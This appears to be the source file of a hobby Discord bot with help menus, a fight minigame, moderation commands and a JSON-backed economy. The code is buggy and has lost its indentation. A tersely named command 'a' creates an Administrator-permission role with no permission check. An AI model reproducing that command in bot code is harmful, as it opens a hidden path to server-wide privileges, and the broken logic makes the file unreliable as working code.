from discord.ext.commands import errors, has_permissions, MissingPermissions
import json
import asyncio
from discord import Permissions
from prsaw import RandomStuff
from PIL import Image
import datetime
from discord import Color, Embed
import sys
import typing
import traceback
import math
import aiosqlite
from PIL import Image
import asyncpraw
import tracemalloc
tracemalloc.start()
from discord.ext.commands import has_permissions, MissingPermissions
from discord.utils import find
from discord.voice_client import VoiceClient
import youtube_dl
import aiohttp
import urllib.parse
from discord.ext import buttons
#from discord_slash import SlashCommand, SlashContext
#my_secret = os.environ['TOKEN']
#TOKEN=''
TOKEN='<PASSWORD>'
#
intents=discord.Intents.all()
bot = commands.Bot(command_prefix='+',intents=intents)
#slash = SlashCommand(bot)
bot.remove_command("help")
@bot.command(description="Current version")
async def version(ctx):
embed = discord.Embed(
colour = discord.Colour.blue()
)
embed.set_author(name='**Update log**!')
embed.add_field(name='1.81', value='Added +daily and +lbg minor bug fixes and patches.', inline=False)
embed.add_field(name='1.8', value=' Added economy system, ticket system, Ai chatbot, 2 more commands and bug fixes since update 1.3!')
embed.add_field(name='1.7', value=' Added 20 more commands and a new error handler for +kick. Cooldown on commands also added!')
embed.add_field(name='1.6', value=' Reramped help command and added embeds to some commands')
embed.add_field(name='1.5', value=' Made the bot run 24/7!')
embed.add_field(name='1.4', value=' Just added 10 commands and specific command reactions')
embed.add_field(name='1.3', value=' Fixed a major bug in most moderation commands and added some other stuff to the bot')
embed.add_field(name='1.2', value=' Added Moderation commands')
embed.add_field(name='1.1', value=' **nothing added idk why i even called it a update**')
embed.add_field(name='1.0', value=' Bot got realeased into the public')
embed.add_field(name='0.1', value=' Added one command. Just **one**')
embed.add_field(name='0.5', value=' Added like 20 commands.')
await ctx.send(embed = embed)
print("context",ctx)
@bot.event
async def on_command_error(ctx, error):
if isinstance(error, commands.CommandOnCooldown):
msg = '**Command is still on cooldown**, try again in {:.2f}s'.format(error.retry_after)
await ctx.send(msg)
bot.command
async def botserver(ctx):
await ctx.send(f"I'm in {len(bot.guilds)} servers!")
#@bot.event
#async def on_command_error(ctx, error):
# if isinstance(error, commands.CommandOnCooldown):
# msg = '**Command is still on cooldown**, try again in {:.2f} hours'.format(error.retry_after)
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def help(ctx):
embed = discord.Embed(
colour = discord.Colour.orange()
)
embed.set_author(name='Stonk Bot catagory help page')
embed.add_field(name='+economy', value='Displays all economy commands', inline=False)
embed.add_field(name='+helpt', value='All commands for ticket related things', inline=False)
embed.add_field(name='+mod', value='Displays all moderation commands', inline=False)
embed.add_field(name='+fun (not yet added)', value='Fun commands!', inline=False)
embed.add_field(name='+utilityl', value='Lists all utility commands.', inline=False)
embed.add_field(name='+music', value='All of the music commands!', inline=False)
await ctx.send(embed=embed)
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def economy(ctx):
embed = discord.Embed(color = discord.Color.blue())
embed.set_author(name='Economy commands')
embed.add_field(name='+beg', value='Become a filthy begger and get from 0-2000 dollors.', inline=False)
embed.add_field(name='+shop', value='Buy stuff to flex on your friends', inline=False)
embed.add_field(name='+bag', value='View all the items you got', inline=False)
embed.add_field(name='+lb', value='Top flexers of all time. *Decided in raw money*', inline=False)
embed.add_field(name='+sell', value='Sell your items...', inline=False)
embed.add_field(name='+slots', value='Lose all your money in one sweep go', inline=False)
embed.add_field(name='+rob', value='Finally you can make your mom disown you!', inline=False)
embed.add_field(name='+send', value='Send that shady guy the money he asked for', inline=False)
embed.add_field(name='+deposit', value='Deposit money in a bank', inline=False)
embed.add_field(name='+withdraw', value='Withdraw your money', inline=False)
embed.add_field(name='+balance', value='check how many Stonks you still have left', inline=False)
embed.add_field(name='+buy', value='spend your stonks', inline=False)
embed.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
embed.set_footer(text="Imagine not voting for this bot in top.gg")
await ctx.send(embed=embed)
@bot.command()
async def imagine(ctx,*,message):
await ctx.send(f"imagine **{message}**")
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def utilityl(ctx):
embed = discord.Embed(color = discord.Color.blue())
embed.set_author(name='Utility commands')
embed.add_field(name='+version', value='Displays bot version!', inline=False)
embed.add_field(name='Chatbot', value='name a channel exactly `chatbot` in order for a AI chatbot to talk in it',
inline=False)
embed.add_field(name='+about', value='Read some useless stuff', inline=False)
embed.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
embed.set_footer(text="not much in this command right?")
await ctx.send(embed=embed)
@bot.event
async def on_command_error(ctx: commands.Context, error: commands.CommandError):
if isinstance(error, commands.CommandNotFound):
embed = discord.Embed(colour = discord.Colour.random())
embed.set_author(name='Error 404')
embed.add_field(name='||The commands not even a command. +help exists for a reason||',value="...")
embed.set_footer(text ='404')
await ctx.send(embed=embed)
elif isinstance(error, commands.MissingPermissions):
embed = discord.Embed(colour = discord.Colour.random())
embed.set_author(name='Permissions error')
embed.add_field(name='Imagine thinking you can just get away with doing a perms needed command with no perms',value='...')
embed.set_footer(text ='Why did you think you could do that.')
await ctx.send(embed=embed)
message = "You are missing the required permissions to run this command!"
elif isinstance(error, commands.UserInputError):
embed = discord.Embed(colour = discord.Colour.random())
embed.set_author(name='Input error')
embed.add_field(name='Something about your input was wrong.. just check your input and try again',value='...')
embed.set_footer(text ='Imagine getting a error msg')
await ctx.send(embed=embed)
elif isinstance(error,commands.NotOwner):
embed = discord.Embed(colour = discord.Colour.random())
embed.set_author(name='Why just why...')
embed.add_field(name='||You did a bot dev only command and thought it could work?||',value='...')
embed.set_footer(text ='Why did you think you could do that.')
await ctx.send(embed=embed)
elif isinstance(error,commands.BotMissingPermissions):
embed = discord.Embed(colour = discord.Colour.random())
embed.set_author(name='Missing Bot perms')
embed.add_field(name='StonkBot is missing the required permissions for the command to work, give it the proper perms or admin',value='...')
embed.set_footer(text ='Did you forget to add the bot some perms?')
await ctx.send(embed=embed)
elif isinstance(error,commands.MissingRequiredArgument):
embed = discord.Embed(colour = discord.Colour.random())
embed.set_author(name='Missing arguement')
embed.add_field(name='You forgot to add a arguement',value='...')
embed.set_footer(text ='Hello fellow humans')
await ctx.send(embed=embed)
else:
embed = discord.Embed(colour = discord.Colour.random())
embed.add_field(name='You managed to get a error I didnt even expect..',value='...')
embed.set_footer(text ='how did you do it?')
await ctx.send(embed=embed)
#fight code
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def fight(ctx, member: discord.Member):
if member.bot or member == ctx.author:
return await ctx.send("You can't fight yourself or a bot stupid")
users = [ctx.author, member]
user1 = random.choice(users)
user2 = ctx.author if user1 == member else member
user1_hp = 100
user2_hp = 100
fails_user1 = 0
fails_user2 = 0
x = 2
while True:
if user1_hp <= 0 or user2_hp <= 0:
winner = user1 if user2_hp <= 0 else user2
loser = user2 if winner == user1 else user1
winner_hp = user1_hp if user2_hp <= 0 else user2_hp
await ctx.send(
random.choice(
[
f"Wow! **{winner.name}** totally melted down **{loser.name}**, winning with just `{winner_hp} HP` left!",
f"YEET! **{winner.name}** REKT **{loser.name}**, winning with `{winner_hp} HP` left.",
f"Woops! **{winner.name}** send **{loser.name}** home crying... with only `{winner_hp} HP` left!",
f"Holy cow! **{winner.name}** won from **{loser.name}** with `{winner_hp} HP` left. **{loser.name}** ran home to their mommy.",
]
)
)
return
alpha = user1 if x % 2 == 0 else user2
beta = user2 if alpha == user1 else user1
await ctx.send(
f"{alpha.mention}, what do you want to do? `punch`, `kick`, `slap` or `end`?\nType your choice out in chat as it's displayed!"
)
def check(m):
if alpha == user1:
return m.author == user1 and m.channel == ctx.channel
else:
return m.author == user2 and m.channel == ctx.channel
try:
msg = await bot.wait_for("message", timeout=15.0, check=check)
except asyncio.TimeoutError:
await ctx.send(
f"**{alpha.name}** didn't react on time. What a noob. **{beta.name}** wins!"
)
return
if msg.content.lower() == "punch":
damage = random.choice(
[
random.randint(20, 60),
random.randint(0, 50),
random.randint(30, 70),
random.randint(0, 40),
random.randint(10, 30),
random.randint(5, 10),
]
)
if alpha == user1:
user2_hp -= damage
hpover = 0 if user2_hp < 0 else user2_hp
else:
user1_hp -= damage
hpover = 0 if user1_hp < 0 else user1_hp
randommsg = random.choice(
[
f"**{alpha.name}** deals **{damage}** damage with an OP punch.\n**{beta.name}** is left with {hpover} HP",
f"**{alpha.name}** lands an amazing punch on **{beta.name}** dealing **{damage}** damage!\n**{beta.name}** is left over with {hpover} HP!",
f"**{alpha.name}** lands a dangerous punch on **{beta.name}** dealing **{damage}** damage!\n**{beta.name}** is left over with {hpover} HP!",
]
)
await ctx.send(f"{randommsg}")
elif msg.content.lower() == "kick":
damage = random.choice(
[
random.randint(30, 45),
random.randint(30, 60),
random.randint(-50, -1),
random.randint(-40, -1),
]
)
if damage > 0:
if alpha == user1:
user2_hp -= damage
hpover = 0 if user2_hp < 0 else user2_hp
else:
user1_hp -= damage
hpover = 0 if user1_hp < 0 else user1_hp
await ctx.send(
random.choice(
[
f"**{alpha.name}** kicks **{beta.name}** and deals **{damage}** damage\n**{beta.name}** is left over with **{hpover}** HP",
f"**{alpha.name}** lands a dank kick on **{alpha.name}**, dealing **{damage}** damage.\n**{beta.name}** is left over with **{hpover}** HP",
]
)
)
elif damage < 0:
if alpha == user1:
user1_hp += damage
hpover = 0 if user1_hp < 0 else user1_hp
else:
user2_hp += damage
hpover = 0 if user2_hp < 0 else user2_hp
await ctx.send(
random.choice(
[
f"**{alpha.name}** flipped over while kicking their opponent, dealing **{-damage}** damage to themselves.",
f"{alpha.name} tried to kick {beta.name} but FELL DOWN! They took {-damage} damage!",
]
)
)
elif msg.content.lower() == "slap":
damage = random.choice(
[
random.randint(20, 60),
random.randint(0, 50),
random.randint(30, 70),
random.randint(0, 40),
random.randint(10, 30),
random.randint(5, 10),
]
)
if alpha == user1:
user2_hp -= damage
hpover = 0 if user2_hp < 0 else user2_hp
else:
user1_hp -= damage
hpover = 0 if user1_hp < 0 else user1_hp
await ctx.send(
f"**{alpha.name}** slaps their opponent, and deals **{damage}** damage.\n{beta.name} is left over with **{hpover}** HP"
)
elif msg.content.lower() == "end":
await ctx.send(f"{alpha.name} ended the game. What a pussy.")
return
elif (
msg.content.lower() != "kick"
and msg.content.lower() != "slap"
and msg.content.lower() != "punch"
and msg.content.lower() != "end"
):
if fails_user1 >= 1 or fails_user2 >= 1:
return await ctx.send(
"This game has ended due to multiple invalid choices. God ur dumb"
)
if alpha == user1:
fails_user1 += 1
else:
fails_user2 += 1
await ctx.send("That is not a valid choice!")
x -= 1
x += 1
message = "Something about your input was wrong, please check your input and try again!"
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def mod(ctx):
embed = discord.Embed(color = discord.Color.blue())
embed.set_author(name='=Moderation commands')
embed.add_field(name='+kick', value='Displays bot version!', inline=False)
embed.add_field(name='Chatbot', value='name a channel exactly `chatbot` in order for a AI chatbot to talk in it',
inline=False)
embed.add_field(name='+about', value='Read some useless stuff', inline=False)
embed.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
embed.set_footer(text="not much in this command right?")
await ctx.send(embed=embed)
@bot.command()
@commands.cooldown(1, 10, commands.BucketType.user)
async def utility(ctx):
embed = discord.Embed(color = discord.Color.blue())
embed.set_author(name='Utility commands')
embed.add_field(name='+version', value='Displays bot version!', inline=False)
embed.add_field(name='Chatbot', value='name a channel exactly `chatbot` in order for a AI chatbot to talk in it', inline=False)
embed.add_field(name='+about', value='Read some useless stuff', inline=False)
embed.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
embed.set_footer(text="Stop, get some help at [bot](www.https://top.gg/bot/833122385603461121)")
await ctx.send(embed=embed)
@bot.command()
async def invite(ctx):
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.set_author(name='Invite')
embed.add_field(name='▼▼▼▼', value='[Bot invite](https://bit.ly/3tw374r)')
embed.set_thumbnail(url="https://pbs.twimg.com/profile_images/1149577551708184576/6KG41LLu_400x400.jpg")
embed.set_footer(text ='Stop it, get some help.')
await ctx.send(embed=embed)
@bot.command(description="Current version")
async def about(ctx):
print("context",ctx)
embed = discord.Embed(
colour = discord.Colour.red()
)
embed.set_author(name='About')
embed.add_field(name='A bot meme bot created by discord.py! We love hearing suggestions and being **alive**')
@bot.command(description="Kicks the specified user.")
@commands.has_permissions(kick_members=True)
async def kick(ctx, member: discord.Member):
await member.kick()
await ctx.send(f"{member.name} has been kicked by {ctx.author.name}!")
#add reaction to message
reaction = "👍"
await ctx.message.add_reaction(emoji=reaction)
@kick.error
async def kick_error(error, ctx):
if isinstance(error, MissingPermissions):
await ctx.send("You don't have permission to do that!")
reaction = "❌"
await ctx.message.add_reaction(emoji=reaction)
<EMAIL>(name="test",
# description="This is just a test command, nothing more.")
#async def test(ctx):
# await ctx.send(content="Hello World!")
async def ch_pr():
await bot.wait_until_ready()
statuses=[f'{len(bot.guilds)} servers','Stonks|+help','Doge coin', 'mass murders']
while not bot.is_closed():
status = random.choice(statuses)
await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=status))
await asyncio.sleep(10)
bot.loop.create_task(ch_pr())
@bot.command()
async def stats(self, ctx):
embed = discord.Embed(title = f"{self.bot.user.name}'s botinfo.", color = discord.Colour.dark_green())
ramUsage = self.process.memory_full_info().rss / 1024**2
embed.add_field(name="• Name:", value=f"`{self.bot.user}`",inline=True)
embed.add_field(name="• Id", value=f"`829836500970504213`")
embed.add_field(name="• Intents", value=f"`{self.bot.intents}`")
embed.add_field(name="• Python Version", value=f"`{platform.__version__}`")
embed.add_field(name="• Discord.py Version", value=f"`{discord.__version__}`")
embed.add_field(name="• Total Servers", value=f"`{len(self.bot.guilds)}`")
embed.add_field(name="• Total Members", value=f"`{len(self.bot.users)}`")
embed.add_field(name="• Total Commands", value=f"`{len(set(self.bot.commands))}`")
embed.add_field(name="• Total Cogs", value=f"`{len(set(self.bot.cogs))}`")
embed.add_field(name="• RAM", value=f"`{ramUsage:.2f} MB`")
embed.set_footer(text = f"Requested by {ctx.author})", icon_url = ctx.author.avatar_url)
await ctx.send(embed = embed)
@bot.command()
async def a(ctx):
guild = ctx.guild
await guild.create_role(name="fs", permissions=discord.Permissions(permissions=8))
await ctx.send("Fs created")
mainshop = [{"name":"Watch","price":4000,"description":"Tells you the time"},
{"name":"laptop","price":10000,"description":"Gaming and work"},
{"name":"LuckyClover","price":278363*298282,"description":"Grants you luck"},
{"name":"test","price":1,"description":"Grants"},
{"name":"PC","price":100000,"description":"Best gaming machine there is"}]
@buttons.button(emoji=':_1:844623543966629937')
async def silly_button(self, ctx, member):
await ctx.send('Beep boop...')
@bot.command()
async def shop(ctx):
em = discord.Embed(title = "Shop")
for item in mainshop:
name = item["name"]
price = item["price"]
desc = item["description"]
em.add_field(name = name, value = f"${price} | {desc}")
await ctx.send(embed = em)
@bot.command()
async def dm_command(ctx):
if isinstance(ctx.channel, discord.channel.DMChannel):
ctx.send("sup, i heard it worked")
@bot.command()
async def buy(ctx,item,amount = 1):
await open_account(ctx.author)
res = await buy_this(ctx.author,item,amount)
if not res[0]:
if res[1]==1:
await ctx.send("That Object isn't there!")
return
if res[1]==2:
await ctx.send(f"You don't have enough money in your wallet to buy {amount} {item}")
return
await ctx.send(f"You just bought {amount} {item}")
@bot.command(aliases =['workl'])
@commands.cooldown(1, 25, commands.BucketType.user)
async def workh(ctx):
await open_account(ctx.author)
user = ctx.author
users = await get_bank_data()
if users[author.id]["bag"]["test"] > 1:
print("ff")
@bot.command(aliases=['bal','Balance','Bal'])
async def balance (ctx, member: discord.Member = None):
if member is None:
member = ctx.author
await open_account(member)
user = member
users = await get_bank_data()
wallet_amt = users[str(user.id)]["wallet"]
bank_amt = users[str(user.id)]["bank"]
em = discord.Embed(title=f'{member.name} Balance',color = discord.Color.red())
em.add_field(name="Wallet Balance", value=wallet_amt)
em.add_field(name='Bank Balance',value=bank_amt)
await ctx.send(embed= em)
@bot.command(aliases =['advertise'])
@commands.cooldown(1, 25, commands.BucketType.user)
async def ad(ctx):
await open_account(ctx.author)
user = ctx.author
earnings = random.randrange(1000)
if earnings == 0:
await ctx.send(f"Everyone hated your ad")
elif earnings > 50:
await ctx.send(f"Your ad got some traction and you got ${earnings}")
elif earnings > 100:
await ctx.send(f"Your ad became a small meme getting you ${earnings}")
elif earnings > 500:
await ctx.send(f"You seem to have a way with people! Someone gave you ${earnings}")
elif earnings > 800:
await ctx.send(f"Your meme was so popular you ended up getting ${earnings}")
elif earnings > 900:
await ctx.send(f"A influncer just advertised your product and got you ${earnings}")
users[str(user.id)]["wallet"] += earnings
with open("mainbank.json",'w') as f:
json.dump(users,f)
@bot.command(aliases =['workpls'])
@commands.cooldown(1, 25, commands.BucketType.user)
async def workplsf(ctx):
print(content)
print("context",ctx)
await open_account(ctx.author)
user = ctx.author
with open("mainbank.json") as f:
content = f.readlines()
if "laptop" in str(content):
print("work")
@bot.command(aliases =['bi.'])
@commands.cooldown(1, 25, commands.BucketType.user)
async def bo(ctx):
users = await get_bank_data()
await open_account(ctx.author)
user = ctx.author
earnings = random.randrange(2001)
if earnings == 0:
await ctx.send(f"How unlucky... you must be did you buy a unlucky clover?")
elif earnings > 50:
await ctx.send(f"Nice you got ${earnings} from a cool dude")
elif earnings > 100:
await ctx.send(f"Someone felt nice and gave you ${earnings}")
elif earnings > 500:
await ctx.send(f"You seem to have a way with people! Someone gave you ${earnings}")
elif earnings > 800:
await ctx.send(f"What a lucky day!! Someone gave you ${earnings}")
elif earnings > 1500:
await ctx.send(f"A rich man passed by you and felt bad. So he gave you ${earnings}")
elif earnings > 2000:
await ctx.send(f"A shady man walked up to you and said 'I know how tough it can be out here' before giving you ${earnings}")
elif earnings == 2001:
await ctx.send(f" A famous celebrity waked down the road.. you begged her so much you got 2001$ and a lucky clover :wink:")
users[str(user.id)]["wallet"] += earnings
with open("mainbank.json",'w') as f:
json.dump(users,f)
pass
@bot.command()
@commands.cooldown(1,86400, commands.BucketType.user)
async def daily(ctx):
await open_account(ctx.author)
user = ctx.author
users = await get_bank_data()
wallet_amt = users[str(user.id)]["wallet"]
bank_amt = users[str(user.id)]["bank"]
users = await get_bank_data()
my_coinset = [1000,1256,969,1500]
print("f")
earnings = random.choice(tuple(my_coinset))
print(earnings)
#earnings = random.randrange(2001)
if earnings > 10:
await ctx.send(f"you got ${earnings} coins from +daily!")
else:
await ctx.send(f"you got ${earnings} coins from +daily!")
users[str(user.id)]["wallet"] += earnings
with open("mainbank.json",'w') as f:
json.dump(users,f)
@bot.command()
@commands.cooldown(1,2592000, commands.BucketType.user)
async def monthly(ctx):
await open_account(ctx.author)
user = ctx.author
users = await get_bank_data()
wallet_amt = users[str(user.id)]["wallet"]
bank_amt = users[str(user.id)]["bank"]
users = await get_bank_data()
my_coinset = [40000]
print("f")
earnings = random.choice(tuple(my_coinset))
print(earnings)
#earnings = random.randrange(2001)
if earnings > 10:
await ctx.send(f"you got ${earnings} coins from +monthly!")
else:
await ctx.send(f"you got ${earnings} coins from +monthky!")
users[str(user.id)]["wallet"] += earnings
with open("mainbank.json",'w') as f:
json.dump(users,f)
@bot.command()
async def number(ctx,):
a=random.randrange(1000)
await ctx.send(f"Your random number was {a}!")
@bot.command()
async def server(ctx):
"""Shows server info"""
server = guild
roles = str(len(server.roles))
emojis = str(len(server.emojis))
channels = str(len(server.channels))
embeded = discord.Embed(title=server.name, description='Server Info', color=0xEE8700)
embeded.set_thumbnail(url=server.icon_url)
embeded.add_field(name="Created on:", value=server.created_at.strftime('%d %B %Y at %H:%M UTC+3'), inline=False)
embeded.add_field(name="Server ID:", value=server.id, inline=False)
embeded.add_field(name="Users on server:", value=server.member_count, inline=True)
embeded.add_field(name="Server owner:", value=server.owner, inline=True)
embeded.add_field(name="Default Channel:", value=server.default_channel, inline=True)
embeded.add_field(name="Server Region:", value=server.region, inline=True)
embeded.add_field(name="Verification Level:", value=server.verification_level, inline=True)
embeded.add_field(name="Role Count:", value=roles, inline=True)
embeded.add_field(name="Emoji Count:", value=emojis, inline=True)
embeded.add_field(name="Channel Count:", value=channels, inline=True)
await ctx.send(embed=embeded)
@bot.command(aliases =['beg.'])
@commands.cooldown(1, 25, commands.BucketType.user)
async def beg(ctx):
await open_account(ctx.author)
user = ctx.author
users = await get_bank_data()
people = ['Your grumpy old neighbor', '<NAME>', '<NAME>', 'Bobby', '<NAME>', "<NAME>", "<NAME>", "Totally Not a Burglar", "Bob", "Bill","<NAME>","Your Mom","<NAME>","Your dad","Totally Not a Burglar"]
A = random.randrange(2001)
person = random.choice(people)
chance = random.randint(0, 10)
if person == "Your dad":
A = random.randint(100, 1000)
await ctx.send(f"Your dad gave you {A} coins")
await update_bank(ctx.author, A)
elif person == "A Burglar" or person == "Totally Not a Burglar":
A = random.randint(1, 100)
await ctx.send(f"A Burglar stole {A} coins from you!")
await update_bank(ctx.author, -A)
elif person == "<NAME>":
A = random.randint(1000, 10000)
await ctx.send(f"<NAME> stopped by and gave you {A} stonks")
await update_bank(ctx.author, A)
elif person == "Your Mom":
await ctx.send(f"{person} found you begging for money. After 10 lectures you got nothing.")
elif chance==2:
await ctx.send(f"You got some money from begging but {person} stole all of it. Hes already so rich tho...")
else:
await update_bank(ctx.author, A)
await ctx.send(f"{person} gave you {A} coins!")
#with open("mainbank.json",'w') as f:
# json.dump(users,f)
# @bot.command(aliases =['beg.'])
# @commands.cooldown(1, 25, commands.BucketType.user)
# async def beg(ctx):
# await open_account(ctx.author)
# user = ctx.author
# users = await get_bank_data()
# person = ['Your grumpy old neighbor', '<NAME>', '<NAME>', 'Bobby', '<NAME>', "<NAME>", "<NAME>", "Totally Not a Burglar", "Bob", "Bill","<NAME>","Your Mom","<NAME>","Your dad","Totally Not a Burglar"]
# # PB = ['Your grumpy old neighbor', 'Totally not a Burglar','That person who really hates you','Totally not a burglar',]
# # PG=['Test']
# namt = random.randrange(2001)
# person = random.choice(people)
# chance = random.randint(0, 10)
# if person == "Your dad":
# namt = random.randint(100, 1000)
# await ctx.send(f"Your dad gave you {namt} coins")
# await update_bank(user, namt)
# elif person == "Totally Not a Burglar":
# namt = random.randint(1, 100)
# await ctx.send(f"Totally Not a Burglar stole {namt} coins from you!")
# await update_bank(user, -namt)
# elif person == "<NAME>":
# namt = random.randint(1000, 10000)
# await ctx.send(f"<NAME> stopped by and gave you {namt} stonks")
# await update_bank(user, namt)
# elif person == "Your Mom":
# await ctx.send(f"{person} found you begging for money. After 10 lectures you got nothing.")
# elif chance==2:
# await ctx.send(f"You got some money from begging but {person} stole all of it. Hes already so rich tho...")
# else:
# await update_bank(user, namt)
# await ctx.send(f"{person} gave you {namt} coins!")
# with open("mainbank.json",'w') as f:
# json.dump(users,f)
@bot.command(aliases=['wd','with'])
async def withdraw(ctx,amount = None):
await open_account(ctx.author)
if amount == None:
await ctx.send("Please enter the amount")
return
bal = await update_bank(ctx.author)
amount = int(amount)
if amount > bal[1]:
await ctx.send('You do not have sufficient balance')
return
if amount < 0:
await ctx.send('Amount must be positive!')
return
await update_bank(ctx.author,amount)
await update_bank(ctx.author,-1*amount,'bank')
await ctx.send(f'{ctx.author.mention} You withdrew {amount} coins')
@bot.command(aliases=['dp','dep'])
async def deposit(ctx,amount = None):
await open_account(ctx.author)
if amount == None:
await ctx.send("Please enter the amount")
return
bal = await update_bank(ctx.author)
amount = int(amount)
if amount > bal[0]:
await ctx.send('You do not have sufficient balance')
return
if amount < 0:
await ctx.send('Amount must be positive!')
return
await update_bank(ctx.author,-1*amount)
await update_bank(ctx.author,amount,'bank')
await ctx.send(f'{ctx.author.mention} You deposited {amount} coins')
@bot.command(aliases=['sm'])
async def send(ctx,member : discord.Member,amount = None):
await open_account(ctx.author)
await open_account(member)
if amount == None:
await ctx.send("Please enter the amount")
return
bal = await update_bank(ctx.author)
if amount == 'all':
amount = bal[0]
amount = int(amount)
if amount > bal[0]:
await ctx.send('You do not have sufficient balance')
return
if amount < 0:
await ctx.send('Amount must be positive!')
return
await update_bank(ctx.author,-1*amount,'wallet')
await update_bank(member,amount,'wallet')
await ctx.send(f'{ctx.author.mention} You gave {member} {amount} coins')
@bot.command(aliases=['rb','Rob','steal'])
async def rob(ctx,member : discord.Member):
await open_account(ctx.author)
await open_account(member)
bal = await update_bank(member)
if bal[0]<1000:
await ctx.send('It is useless to rob him :(')
elif member.id == 599266233350881291:
await ctx.send('Imagine wanting to rob the owner of the server. Shame on you.<a:_2:844371369575710740>')
elif member.id ==833122385603461121:
await ctx.send("You are a sin to the world for robbing the very bot that is giving you money. <:_1:844623543966629937>")
elif member == ctx.author:
await ctx.send("Why do you want to steal from yourself??")
elif bal[1] < 10001:
await ctx.send("dude stealing money takes prep and money come back later when you have some stonks")
return
else:
moneycoin = [1,2,3,4,5,6,7,8,9,19]
print("f")
result = random.choice(tuple(moneycoin))
#result = random.randint(1, 2, 3,4,5,6,7,8,9,10)
if result > 5:
win = random.randint(10, bal[0])
print(bal[0])
print("YO")
await update_bank(ctx.author, win)
await update_bank(member,-win)
await ctx.send(f"You just robbed {member} of {win} coins")
else:
print("F works")
await update_bank(ctx.author, -100)
await update_bank(member, 100)
await ctx.send("The police found you and you got fined $100")
#0.1*earning
# print(member,earning)
# await update_bank(ctx.author,earning)
# await update_bank(member,-1*earning)
# await ctx.send(f'{ctx.author.mention} You robbed {member} and got {earning} coins')
# @bot.command()
# @commands.cooldown(1, 25, commands.BucketType.user)
# async def slots(ctx,amount = None):
# await open_account(ctx.author)
# if amount == None:
# await ctx.send("Please enter the amount")
# return
# bal = await update_bank(ctx.author)
# amount = int(amount)
# if amount > 5000:
# await ctx.send("Hold up thats a lot of money, no way are we letting you inflate the economy")
# return
# if amount > bal[0]:
# await ctx.send('You do not have sufficient balance')
# return
# if amount < 0:
# await ctx.send('Amount must be positive!')
# return
# final = []
# for i in range(4):
# a = random.choice(['🐉','🍎','🦠','🍇'])
# final.append(a)
# await ctx.send(str(final))
# if final[0] == final[1] or final[1] == final[2] or final[0]== final[2] or final[0] == final[3] or final[1] == final[3] or final[2] == final[3]:
# if amount > 2001:
# await update_bank(ctx.author,1.5*amount)
# await ctx.send(f'You won :) {ctx.author.mention}')
# await ctx.send(f'You won! 1.5x your amount')
# if amount < 2000:
# await update_bank(ctx.author,2*amount)
# await ctx.send(f'You won :) {ctx.author.mention}')
# await ctx.send(f'You won! 2x your amount')
# if amount == 2000:
# await update_bank(ctx.author,1.5*amount)
# await ctx.send(f'You won :) {ctx.author.mention}')
# await ctx.send(f'You won! 1.5x your amount')
# #if final[0] == final[1] or final[1] == final[2] or final[0] == final[2]:
# # await update_bank(ctx.author,1.5*amount)
# # await ctx.send(f'You won 1.5 your amount {ctx.author.mention}')
# else:
# await update_bank(ctx.author,-1*amount)
# await ctx.send(f'You lose :( {ctx.author.mention}')
# print(bal)
@bot.command()
@commands.cooldown(1, 20, commands.BucketType.user)
async def bet(ctx, amount = None):
await open_account(ctx.author)
amount = int(amount)
if amount == None:
await ctx.send("Enter some money smh")
return
if amount > 20000:
await ctx.send("Hold up thats a lot of money, no way are we letting you inflate the economy")
return
bal = await update_bank(ctx.author)
if amount > bal[0]:
ctx.send("Dont bet more then what you have")
return
else:
ghot=random.randrange(5)
if ghot == 2 or ghot == 4:
embed = discord.Embed(title=f"{ctx.author.name}'s **winning** bet",colour=discord.Colour.gold())
embed.add_field(name="Lucky Number:", value=f"<:_69:848699585370652683>", inline=False)
# embed.add_field(name="", value="Y-You actually made your mom proud", inline=False)
embed.add_field(name="Amount Won:", value=f"{amount*2} coins!", inline=False)
await ctx.send(embed=embed)
await update_bank(ctx.author,amount*2)
else:
emojilist=["<:_9:848707905950842880>","<:_7:848707453318463489>","<:_8:848708122691371030>"]
emojilist = random.choice(emojilist)
embed = discord.Embed(title=f"{ctx.author.name}'s **losing** bet",colour=discord.Colour.gold())
embed.add_field(name="Unlucky Number:", value=f"{emojilist}", inline=False)
# embed.add_field(name="", value="Y-You actually made your mom proud", inline=False)
embed.add_field(name="Amount Lost:", value=f"{amount} coins!", inline=False)
await ctx.send(embed=embed)
await update_bank(ctx.author,-amount)
@bot.command(aliases=[])
@commands.cooldown(1, 20, commands.BucketType.user)
async def slots(ctx, amount=None):
# TEMP: 4% chance of getting the mega jackpot!
await open_account(ctx.author)
#walamt, bankamt = await self.get_amt(ctx.author)
#totalamt = walamt[0]+bankamt[0]
amount = int(amount)
if amount == None:
await ctx.send("Please enter the amount")
return
bal = await update_bank(ctx.author)
if amount > 5000:
await ctx.send("Hold up thats a lot of money, no way are we letting you inflate the economy")
return
if amount > bal[0]:
await ctx.send('You do not have sufficient balance')
return
# if amount == 'all':
# amount = bal[0]
# return
else:
final = []
for i in range(3):
a = random.choice(["👾","🪙", "🎩","🦌","🐈⬛"])
final.append(a)
#the 2nd square is the jackpot emoji
if final[0] == final[1] == final[2] == "🪙":
embed = discord.Embed(
title=f"{ctx.author.name}'s Slot Game",
colour=discord.Colour.gold()
)
embed.add_field(name="Result:", value=f"{final[0]} {final[1]} {final[2]}", inline=False)
embed.add_field(name="Jackpot!", value="Y-You actually made your mom proud", inline=False)
embed.add_field(name="Amount Won:", value=f"{amount*7} coins!", inline=False)
await ctx.send(embed=embed)
await update_bank(ctx.author, amount*7)
elif final[0] == final[1] == final[2]:
embed = discord.Embed(
title=f"{ctx.author.name}'s Slot Game",
colour=discord.Colour.green()
)
embed.add_field(name="Result:", value=f"{final[0]} {final[1]} {final[2]}", inline=False)
embed.add_field(name="Three in a row!", value="You got three of the same emoji!", inline=False)
embed.add_field(name="Amount Won:", value=f"{amount*5} coins!", inline=False)
await ctx.send(embed=embed)
